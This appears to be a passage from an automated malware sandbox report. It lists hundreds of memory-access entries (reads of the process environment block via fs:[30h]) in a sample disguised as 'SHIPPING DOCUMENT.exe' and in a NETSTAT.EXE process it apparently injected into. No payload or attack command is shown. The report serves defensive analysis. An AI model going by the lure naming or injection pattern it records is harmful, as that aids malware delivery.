          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B814FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B9740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B905AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B78DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B46DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B4A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B03D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B43540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AE7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B90EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B7FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B08EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B7FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ACC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AF8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B81608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B8AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B47794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AD8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AC4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AFA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B5FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B9070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00AEF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00B98F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\SHIPPING DOCUMENT.exeCode function: 1_2_00ADEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03947794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03995BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039453CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039037F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0398131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0399070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0399070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038EF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0395FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_039446A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03990EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038DAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03998ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03908EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038D8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038F8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03981608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038E3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038FA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_0397FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038CE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03904A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03904A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_03954257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 8_2_038C9240 mov eax, dword ptr fs:[00000030h]
